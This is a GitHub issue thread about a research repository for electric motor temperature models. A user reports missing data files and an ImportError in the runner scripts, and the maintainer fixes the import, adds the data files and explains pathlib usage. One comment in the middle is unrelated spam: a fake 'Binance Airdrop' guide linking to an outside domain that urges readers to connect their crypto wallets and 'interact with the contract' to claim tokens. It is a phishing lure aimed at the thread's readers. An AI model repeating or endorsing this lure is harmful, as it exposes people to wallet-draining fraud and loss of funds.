### ISSUE TITLE
Unable to run the runner scripts "run_*.py"  in src folder

### ISSUE THREAD

**Issue by Nand-De** [wkirgsn/diss-wk#1]
Hi

I tried running a some of the  runner scripts under the src directory. However, I am getting different errors for different files.
Is there a sequence of scripts to be executed ? I guess the runner scripts will have to be executed before the visualization scripts.

While trying to run 'run_scipy_opt_lptn_4_diss.py ' I get the following error: 'No such file or directory'.
The script is trying to access 'custom_hpo_lptn.pkl.zip' which  does not exist.
PFA screenshot of error.   
![code1error](https://github.com/wkirgsn/diss-wk/assets/154973105/39da0353-2816-4148-91c0-4f3bb2d1cdb0)

While running another script  ' \run_linear_analysis_4_diss.py' , I got the error input file not found. I have downloaded the data from Kaggle as mentioned and stored it under the input directory.
However, the program requires another input file which is not available on Kaggle website.
PFA screenshot of error.
![code2error](https://github.com/wkirgsn/diss-wk/assets/154973105/305a19bd-6515-49e2-8b91-074e9c95c393)

The same issue is observed while running the script 'run_blackbox_static_4_diss.py'.
There are more errors in other runner files. 
Please let me know how to proceed. Thanks.

'

**Comment by Nand-De** [comment]
While running the script 'run_lptn_4_diss.py', following error is observed.

**_ImportError: cannot import name 'ElSystemResponseCell' from 'mawkutils.topology' (C:\.......\PMSM-\diss-wk-main\src\mawkutils\topology.py)_**

Essentially I am unable to run most of the runner scripts due to these issues.

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @yuecen, @mehmetcanbudak, @charleswwilson, @esposni, @ebdavison, @sudotty, @random666walk, @giranntu, @oudommeas, @briguyjm

**Comment by wkirgsn** [comment]
Thanks for letting me know, I will work on fixing that

**Comment by wkirgsn** [comment]
I just fixed the import bug where it was asking for "ElSystemResponseCell".
Moreover, I added three zip files that are read in the runner scripts.

For the "smooth" data set, this will require you to smooth the ambient temperature with a filter and store that transformed data set to disk with that "smooth" prefix.
Alternatively, change the code to use the normal KaggleDataset class in `src/mawkutils/data.py` instead of SmoothKaggleDataset, to use the original kaggel data set.

I know this is not very user friendly, and I should add a preprocessing step there. This will take a few days from my side.

**Comment by Nand-De** [comment]
> I just fixed the import bug where it was asking for "ElSystemResponseCell". Moreover, I added three zip files that are read in the runner scripts.
> 
> For the "smooth" data set, this will require you to smooth the ambient temperature with a filter and store that transformed data set to disk with that "smooth" prefix. Alternatively, change the code to use the normal KaggleDataset class in `src/mawkutils/data.py` instead of SmoothKaggleDataset, to use the original kaggel data set.
> 
> I know this is not very user friendly, and I should add a preprocessing step there. This will take a few days from my side.

HI

Thanks for solving one of the issues
I have run the program run_scipy_opt_lptn_4_diss.py

First I converted it to a Jupyter file, then ran on windows and looks like its working fine.
However if I use it in Colab I get the following error:
![ColabError1](https://github.com/wkirgsn/diss-wk/assets/154973105/d0aa3ff7-f360-4a43-bea4-becbdc928a8b)

It will be of help if you can let me know how to go about it. 
Also I would like to know which of the programs (in the src directory) will be useful to work with in order to use these further to work with NNs i.e. CNN/ RNN for electric motors.
One suggestion is that if you can provide approximate running time for each of the code to run on CPU/GPU that will be helpful.
Thanks.

**Comment by wkirgsn** [comment]
Hey,
the code requires you to provide the path as pathlib.Path object. Such objects have methods and attributes such as "suffixes".
Please refer to [Python pathlib doc](https://docs.python.org/3/library/pathlib.html)

All files in topology.py will give building blocks for working with your requested topologies.
Please understand that I can't provide runtime info, and that it would differ for each hardware combo as well as hyperparameter setup anyway.
